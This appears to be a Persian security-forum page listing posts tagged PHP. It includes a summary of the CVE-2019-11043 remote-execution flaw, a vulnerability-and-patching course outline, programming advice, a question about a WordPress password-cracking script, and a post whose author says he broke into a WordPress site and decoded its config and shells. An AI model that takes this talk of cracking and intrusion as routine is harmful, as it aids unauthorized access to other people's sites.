بچه ها این آسیبپذیری با شماره CVE-۲۰۱۹-۱۱۰۴۳ ردیابی میشه و به مهاجمان اجازه میده تا با دسترسی به یک URL ساخته شده، دستوراتی را روی سرورها اجرا کنن. بهرهبرداری از این آسیبپذیری به سادگی انجام میشه و کد اثبات مفهومی (PoC) اون به صورت عمومی توی گیتهاب منتشر شده و در دسترس همه هست اسکریپت PoC موجود در گیتهاب میتونه از طریق وب سرور مورد نظر، وجود آسیبپذیری رو بررسی کنه و وقتی که یک هدف آسیبپذیر شناسایی بشه، مهاجم میتونه به سرور وب آسیبپذیر، درخواست دستکاری شده ارسال کنه البته همه سرورهای مبتنی بر PHP تحت تأثیر قرار نمیگیرن و فقط سرورهای NGINX که ویژگی PHP-FPM اونا فعال باشه آسیبپذیر هستن
- 2 پاسخ
-
- php
- آسیب پذیری جدید در php
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
**************** سلام با آموزش اولین فصل از دوره آموزشی لینوکس lpic-1 در خدمت شما دوستان عزیز هستم. قصد دارم قسمت به قسمت این دوره دوست داشتنی رو با هم یاد بگیریم و تبدیل به لینوکس کار حرفه ای شویم. پس همراه من باشید. ansible.pdf lpic-1.pdf
- 1 پاسخ
-
- دوره آموزشی لینوکس
- lpic 2 - exam 202
- (و 12 مورد دیگر)
-
PHP: Allowed memory size of x bytes
MR.Moein پاسخی ارسال کرد برای یک موضوع در سوال و جواب های ابزارهای امنیتی
سلام من میخام یه اسکریپت برای کرک پسورد وردپرس رو توی سیستمم اجرا کنم ولی ارور میده....اگه پسورد لیست با حجک کم بزارم مشکل حل میشه ولی دلیلش چیه!!! با تشکر- 3 پاسخ
-
- php
- allowed memory size of x bytes
- (و 6 مورد دیگر)
-
این PDF محتوای آموزرش فارسی زبان php را در بر دارد php.pdf
-
سلام دوستان عزیز یک مجموعه آموزش کامل طراحی وبسایت از آقای میلاد عباسی ! اول به صورت کامل HTML رو آموزش میده سپس میره سراغ طراحی قالب WordPress هر روز یک جلسه قرار خواهد گرفت و پسورد تمامی فایل ها guardiran.org خواهد بود ! لطفا به هیچ وجه پست ندید ! یا حـ ـق ../
-
با سلام و دورد سورس کد ربات ساخت بارکد توکن و ایدی ادمین را جایگزین کنید به دلخواه کلماتشم خواستید عوض کنید دانلود= MakeBarcode.php
- 10 پاسخ
-
- سورس کد php
- سورس
- (و 6 مورد دیگر)
-
به نام خدا در این تاپیک قصد دارم تا آموزش آسیب پذیری های PHP و نحوه پچ کردن اون هارو آموزش بدم پیش نیاز این تاپیک اسکریپتی هست که من برای تیم نوشتم(اینجا) و آشنایی ابتدایی با زبان php در این تاپیک سعی میکنم که آسیب پذیری هارو به صورت کامل یعنی اول برسی میکنیم که چطور این آسیب پذیری به وجود میاد بعد این که یک نفوذگر چطور با استفاده از این آسیب پذیری به وب سایت شما نفوذ می کنه و بعد هم نحوه پچ کردن اون آسیب پذیری. سر فصل آموزش ها : - SQL Injection - Blind SQL Injection - Authentication Bypass - File Upload - Stored Cross Site Scripting - Reflected Cross Site Scripting - Dom Cross Site Scripting - Cross Site Request Forgery - Remote File Inclusion - Local File Disclosure/Download - Remote Code Execution - Remote Command Execution تاپیک به مرور زمان آپدیت خواهد شد پس لطفا با اسپم های بی جا خرابش نکنین سوالی داشتید میتونید در پ.خ و یا در بخش مربوطه بپرسید
- 2 پاسخ
-
- آسیب پذیری های php
- sql injection
-
(و 3 مورد دیگر)
برچسب زده شده با :
-
با سلام بر ان شدیم تا یک تایپک جامع درباره از کجا باید برنامه نویسی را شروع کنیم خدمتتان اراعه دهیم و پاسخ کلی دوستان تازه کاربرنامه نویس را داده باشیم تا جایی که امکان پذیر بوده است مطالب جامع و کامل جمع اوری شده اند قبل از ارسال پست قوانین را مطالعه فرمایید اصولا شما اگر برنامه نویس حرفه ای و یا معمولی باشید با این سوالات تکراری درزندگی روز مره مواجه خواهید شد بهترین زبان برنامهنویسی چیست؟ چقدر طول میکشد تا یه برنامهنویس خوب بشویم؟ میزان درآمد یک برنامهنویس چقدر است؟ تا چندسالگی میتوانم برنامهنویسی کنم؟ برای برنامهنویس شدن حتما باید رشتهی دانشگاهیام کامپیوتر باشد؟ اساسا چرا برنامهنویسی؟! قبل از هر چیزی با خودتان صادق باشید. چه چیزی باعث شد که تمایل پیدا کنید برنامهنویسی را یاد بگیرید؟ درآمد بالای برنامهنویسان، علاقه به کامپیوتر و مباحث پیشرفتهی آن، وجههی شخصیتی که برنامهنویسان در اجتماع دارند، نیاز به شغلی که بتوانید در خانه بمانید و پول در بیاورید، تغییر جهان یا حتی به فعلیت رساندن ایدههایتان. اینها همه دلایل بسیار خوبی برای شروع یادگیری برنامهنویسی هستند ولی شاید دلایل خوبی برای ادامه نباشند. برنامهنویسی نیاز به عشق، علاقه و پشتکار دارد. زندگی یک برنامهنویس با خطاها و انجام نشدن و زیر سوال رفتن مواردی که قبلا یاد گرفته، عجین است. در هر پروژهای برنامهنویسان میزان زیادی از وقتشان را برای رفع خطاهای موجود در برنامهی نوشتهشده صرف میکنند و شاید روزها طول بکشد تا بفهمند مشکل کار تنها از یک غلط املایی بوده است یا هر چیز دیگری. پس به عنوان یک برنامهنویس نیاز به این خواهید داشت که واقعا صبور و باپشتکار باشید. باید قبول کنیم که برنامهنویسی کار سادهای نیست. همین ساده نبودن برنامهنویسی، آن را خاص کرده است. نیازی نیست حتما در رشتهی کامپیوتر دارای تحصیلات باشید یا حتما سنتان بالای ۲۰ و کمتر از ۳۵ باشد. یا حتی نیاز نیست انسان بسیار باهوشی باشید یا ریاضیتان خیلی قوی باشد. ولی اگر همهی اینها را داشته باشید، ممکن است در کنار دیگر برنامهنویسان از جایگاه بهتری برخوردار شوید. اگر پشتکار زیادی در یادگیری ندارید و همچنین اصلا حوصلهی درگیر شدن با مسائل سخت و پیچیده را ندارید از شما میخواهیم که دستتان را به کد آلوده نکنید و به سراغ مهارتهای دیگری بروید. با شرکت در یک دورهی برنامهنویسی یا خواندن یک کتاب جامع، شما یک برنامهنویس خواهید بود؛ برنامهنویس به این معنی که میتوانید به مطالب گفتهشده در آن کتاب یا آن دوره عمل کنید و بتوانید آن پروژهها را از نو بنویسید. برای یادگیری اولیهی برنامهنویسی زمان زیادی نیاز ندارید؛ ولی برای آنکه بتوانید آنچه را در ذهن شما یا مشتریتان است انجام دهید به تجربههای زیادی نیاز دارید. در واقع، شما به تخصصهای زیادی نیاز خواهید داشت که بسیاری از آنها در هیچ کتاب یا آموزشگاهی ارایه نمیشوند. بعد از اینکه متوجه شدید که راه سادهای در پیش ندارید و درصورتیکه همچنان دوست دارید برنامهنویس شوید، باید تکلیف خود را روشن کنید و برای آیندهتان تصمیم درستی بگیرید. این تصمیم آیندهی شما را تغییر خواهد داد. پس باید با خود صادق باشید و از روی احساس تصمیم نگیرید. کدام زبان های برنامه نویسی ارزش فراگیری دارند؟ PYTHON: جزو محبوبترین زبانهای برنامهنویسی دانشگاههای ایالات متحده امریکا است. توسعهدهندگان از پایتون برای ساخت اپلیکیشنهای دسکتاپ و موبایل استفاده میکنند. همچنین پایتون گزینهی بسیار مناسبی برای انجام فعالیتهای داده کاوی (Data Mining) است.پایتون محبوبیت بالایی در جوامع علمی و دانشگاهی برای فعالیت در حوزههای تحلیل داده و بیوانفورماتیک دارد. از پایتون برای برنامهنویسی در ویندوز، مک و لینوکس میتوان استفاده کرد. گوگل، دراپ باکس، پینترست، اینستاگرام، ردیت، بیت تورنت و Civilization IV شرکتهایی هستند که از پایتون در بسیاری از پروژههایشان بهره میبرند. PHP: یک زبان اسکریپتی سمت سرور و متنباز (Open Source) است. بسیاری از وبسایتهایی که روزانه از آنها بازدید میکنید، بهوسیلهی PHP ساخته شدهاند. فیسبوک، یاهو، ویکیپدیا، تامبلر، وردپرس و بسیاری دیگر از سایتها مواردی هستند که از PHP قدرت گرفتهاند. PHP قواعد دستوری سختی ندارد که این موضوع باعث میشود بهراحتی بتوانید آن را یاد بگیرید. جالب است به این نکته اشاره کنیم که شما از همان اولین روزهای یادگیری PHP میتوانید پروژههای خوبی تولید کنید که باعث بالا رفتن روحیهتان برای ادامهی کار میشود. C و ++C: از زبان برنامه نویسی C معمولا برای ساخت برنامههای سیستمی استفاده میشود. زبان برنامهنویسی C یک زبان قابل آمیخته شدن با سایر زبانها در سیستم عامل است. ++C یک زبان قدرتگرفته از C است. از ++C در ساخت موتورهای بازیسازی، نرمافزارهای دسکتاپی، اپلیکیشنهای موبایل و حتی نرمافزاری تحت وب میتوان استفاده کرد. ++C بسیار سریع و قدرتمند است؛ طوریکه فیسبوک از آن برای انجام پردازشهای سنگین استفاده میکند.اگر شما درک خوبی از زبان C داشته باشید در یادگیری سایر زبانهای برنامهنویسی مشکلی نخواهید داشت. ازآنجاکه هنگام برنامهنویسی به زبان ++C / C برای انجام یک فعالیت ساده نیاز است که مقدار کد زیادی نوشته شود، بسیاری از برنامهنویسان مبتدی روحیهشان را در ابتدای کار از دست میدهند. فراموش نکنید که یادگیری C یا ++C درک خوبی از منطق برنامهنویسی به شما میدهد. بنابراین اگر در ابتدای کار هستید به شما پیشنهاد میکنیم که برای داشتن درک خوب از برنامهنویسی مدتی روی یادگیری ++C / C وقت بگذارید ولی انتظار ساخت نرمافزارهای حرفهای را نداشته باشید. #C: محصولی از شرکت مایکروسافت و بر پایهی فریمورک «دات نت» (.net) است. از #C برای برنامهنویسی تحت وب (بهوسیلهی ASP)، ساخت بازیهای کامپیوتری و ساخت نرمافزارهای دسکتاپی میتوان استفاده کرد.اگرچه در گذشته #C یک زبان چندسکویی نبوده ولی هماکنون به کمک پروژهای تحت عنوان Mono که بهوسیلهی شرکت «زامارین» (Xamarin) ارایه شده، میتوان از #C برای برنامهنویسی اندروید و iOS هم استفاده کرد. SQL: در ایران زیاد به عنوان یک زبان برنامهنویسی یاد نمیشود و صرفا مهارتی الزامی در کنار سایر مهارتها به شمار میرود. ولی با رشد اهمیت موضوعاتی مانند بزرگ دادهها (Big Data) ترجیحمان بر این بود که SQL هم در این لیست قرار گیرد.از SQL برای کار روی پایگاههای داده در محیطهای مختلف میتوان استفاده کرد. تقریبا در هر زمینهی برنامهنویسی که بخواهید کار کنید، برای ذخیرهسازی اطلاعاتتان در پایگاه داده به SQL نیاز خواهید داشت. یادگیری SQL بسیار سریع و لذتبخش است. با یادگیری این زبان و حرفهای شدن در آن میتوانید به عنوان یک مدیر پایگاه داده کار کنید. JAVA: زبانی چندسکویی (Cross-Platform) و مستقل از سیستم عامل است که ویژگیهایی مانند امنیت و قابلیت استفاده در پلتفرمهای مختلف را برای توسعهدهندگانش به ارمغان میآورد. از جاوا برای ساخت اپلیکیشنهای اندروید، برنامههای دسکتاپی و بازیها میتوان استفاده کرد.جاوا زبانی کلاسیک و ریشهدار است که بهخوبی از پس انجام پروژههای نرمافزاری بزرگ (Enterprise) برمیآید. علاوهبراین «هدوپ» (Hadoop) یک فریمورک تحت جاوا برای انجام پردازش روی دادههای بزرگ (Big Data) است که در وبسرویسهای یاهو، فیسبوک و آمازون مورد استفاده قرار میگیرد. بنابراین چه بخواهید برای تلفن همراهتان اپلیکیشن بسازید و چه بخواهید روی الگوریتمهای پیچیده کار کنید، جاوا یک همراه خوب برای شما خواهد بود. JAVVA SRIPT: بسیاری از کاربران جاوا اسکریپت و جاوا را با هم اشتباه میگیرند. جاوا اسکریپت یک زبان کاملا مستقل و جدا از جاوا است. وجود نام جاوا در ابتدای جاوا اسکریپت تنها یک شباهت اسمی است. جاوا اسکریپت در درجهی اول یک زبان اسکریپتی سمت کاربر برای وب است که از آن برای توسعهی رابط کاربری استفاده میشود. برنامههای وب در زبانهای سمت کاربر روی کامپیوتر کاربر اجرا و از منابع سیستمی مثل رم و CPU کاربر استفاده میکنند.تا مدتی پیش از جاوا اسکریپت تنها در وبسایتها برای انجام برخی رویدادهای سمت کاربر (رویدادهایی که در مرورگر وب اجرا میشوند) استفاده میشد. بعد از مدتی پای فریموُرکها در جاوا اسکریپت باز شد و کارها با سادگی و سرعت هرچهتمامتر انجام پذیرفت. درواقع قبل از ورود فریمورکها در جاوا اسکریپت، ساخت وب اپلیکیشنها هیچگاه به این سادگی نبود. ساخت وب اپلیکیشنها بهوسیلهی کتابخانههایی مانند jQuery ،AngularJS ،Ember.js ،React و غیره انجام میشود. کدام راه برای یادگیری بهتر است ؟ شاید از هر کسی که اکنون برنامه نویس است بپرسید با چه روشی توانسته برنامه نویسی را یاد بگیرد به شما جواب های متفاوتی بدهند. بعضی ها روی کتاب تاکید دارند چون معتقند بسیار منسجم است مخالفان نیز یادگیری از روی کتاب را واقعا خسته کننده میدانند. عده ای هم اینترنت را بهترین استاد می دانند چون اعتقاد دارند هرچیزی درآن یافت میشود مخالفان نیز میگوید اینترنت در واقع انبوهی از اطلاعات است که می تواند شما را سردرگم کند همچنین هرکسی می تواند آنها را تولید کرده باشد و معتبر نباشد. یک عده هم رفتن به کلاس های برنامه نویسی رو به دلیل پروژه محور بودند پیشنهاد میدهد، مخالفان این روش یادگیری را استاد محور و متکی به دانش مدرس میدانند. فیلم های آموزشی شرکت های معتبر آموزشی هم روشی که است که بعضی ها پیشنهاد می دهد که در اینجا مخالفان حرفی برای گفتند ندارند. چون تمام ویژگی های خوب روش های قبلی را باهم دارد: منسجم است، بهترین اساتید جهان مدرس آنهایند، ارزان قیمت است و پروژه محور هستند. روشی را برای یادگیری برنامه نویسی انتخاب کنید که ساده باشد و باعث شود از یادگیری لذت ببرید. اگر از من بپرسید چه روشی را برای یادگیری برنامه نویسی پیشنهاد میدهم بدون شک اولین گزینه من دیدن فیلم های آموزشی شرکت های معتبر است. دلایلم هم این است: بهترین اساتید دنیا و زیر نظر معتبرترین شرکت های آموزشی آنها را تهیه و تولید کرده اند. پروژه محور هستند. کامل و منسجم هستند، میتواند یک دوره کامل از معرفی ابزارهای مورد نیاز تا ساخت یک پروژه را در بر بگیرند و در کل دیدن فیلم از خواندن متن لذت بخش تر است. اکثر برنامهنویسانی که در اطرافتان میبینید، اولین برنامهای که موفق به نوشتناش شدند، برنامهی ساده ای بوده است که صرفا یک پیغام کوتاه روی نمایشگر نمایش میدهد. اگر از روی یک کتاب یا هرچیز مشابه آن اقدام به یادگیری برنامهنویسی میکنید، تمام تمرینهای خواستهشده را حتی اگر شده با تقلب کردن از دیگران، انجام دهید. سپس کمی خلاقیت خرج دهید و آن را به سبک خودتان بازنویسی کنید.پس از آنکه کمی در کار خود پیشرفت کردید سعی کنید با چیزهایی که بلدید یک برنامه بنویسید. برای خودتان یک پروژه تعریف کنید و تمام تلاشتان را کنید که آن پروژه را با کیفیت بالا انجام دهید. همچنین میتوانید با استفاده از سایتهایی مثل سورس فروج کدهای سایر برنامهنویسان را بهرایگان دریافت کنید و ببینید آنها چگونه آن برنامه را نوشتهاند و سپس خودتان را با آنها مقایسه کنید. یکی از کارهای پسندیدهای که برنامهنویسان حرفهای انجام میدهند انتشار کدهای نوشتهشدهشان در محیط اینترنت است. این کار باعث میشود که در ابتدا برنامهنویسان مبتدی بتوانند تجربیاتی از کدهای آنها کسب کنند. برنامهنویسان حرفهای و نیمهحرفهای هم میتوانند برنامههایشان را از این طریق توسعه داده و آنها را به برنامههای بهتری تبدیل کنند. سایت گیت هاب یکی از وبسایتهای بسیار معروف در این زمینه است که با جستوجو در آن میتوانید پروژههای انجام شده بهوسیلهی سایر برنامهنویسان را مشاهده و دانلود کنید. شما میتوانید برنامهها را توسعه دهید و دوباره منتشر کنید. حتی میتوانید به برنامهای قابلیت جدیدی اضافه کنید.اگر تا به اینجای کار هنوز پروژهای برای دوستان یا آشنایانتان انجام ندادهاید و کمی استرس دارید که شاید از پس پروژههای تجاری برنیایید، به شما پیشنهاد میکنم با جستوجوی ساده در گوگل (البته به زبان انگلیسی) در انجام پروژهای داوطلبانه شرکت کنید. پروژههای داوطلبانه معمولا بهوسیلهی چند نفر با تخصصهای مشابه و شاید هم متفاوت انجام میشوند و از آنها درآمدی عاید شما نمیشود. برنامهنویسی برای بیمارستانها، خیریهها و سایر موسسات غیرانتفاعی از نمونه پروژههای داوطلبانه هستند که در انتهای پروژه شما چند دوست خارجی، مقدار زیادی اعتمادبهنفس و یک نمونه کار دارید.
- 2 پاسخ
-
- python
- برنامه نویس
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
با سلام در این تایپک می پردازیم به اموزش زبان برنامه نویسی PHP اموزش ها در سطح مقدماتی می باشد هر گونه سوال و یا مشکلی بود در پ.خ(پیام خصوصی) در خدمت هستم اموزش ها اختصاصی تیم امنیتی گارد ایران می باشد کیفیت قسمت ها: خوب صدا: دارد زبان: فارسی پسورد: guardiran.org
-
آموزش دیکد کردن php
k.shadow پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام خدمت همه دوستان گارد ایران امروز اموزش دیکد کردن فایل های php رو براتون اماده کردم در اصل خودم وقتی به یک سایت wordpress ی نفوذ کردم کانفیگش کد شده بود وقتی اونو دیکد کردم به فکرم رسید اموزش دیکد کردن فایل های php رو براتون اماده کنم ) که حتی شلر هارو هم بتونید باهش دیکد کنید نکته اینجا هست که بتونیم کد برعکس عمل اینکد شده رو بنویسیم چون php اوپن سورس هست پس میشه فهمید چجوری دیتا ها کد میشن و چجوری توسط خود php دیکد میشن من رو لوکال هساست نتونستم تست کنم رو هاست رایگان گذاشتم چون iis ارور داد !!! احتمالا با wamp بشه php decod.part1.rar php decod.part2.rar php decod.part3.rar پیروز باشید .... -
سلام... در این بخش کتاب های اموزش php قرار داده میشود لطفا کسانی ک کتابی در این زمینه دارند کمک کنند ممنون خودم 3 تا کتاب به زبان فارسی میزارم: 1:: دانلود حجم : 2.55 مگابایت 2:: دانلود حجم : 4.31 مگابایت 3:: دانلود حجم : 3.54 مگابایت
-
- اموزش پی اچ پی
- php
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
دوستان سوالات PHP رو میتونید اینجا بپرسید اولین سوال اینه : من هنوز دقیق نمیدونم چه موقع از Return و چ موقع از Echo برای نمایش مقدار در یک تابع استفاده میشه ؟! توی مثال های مختلف فرق میکنه و بعضیا با Echo اشتباه درمیان یا برعکس با return نمیشه ... لطفا کسی اگه میدونه کابرداشون دقیقا چ فرقی داره بگه ..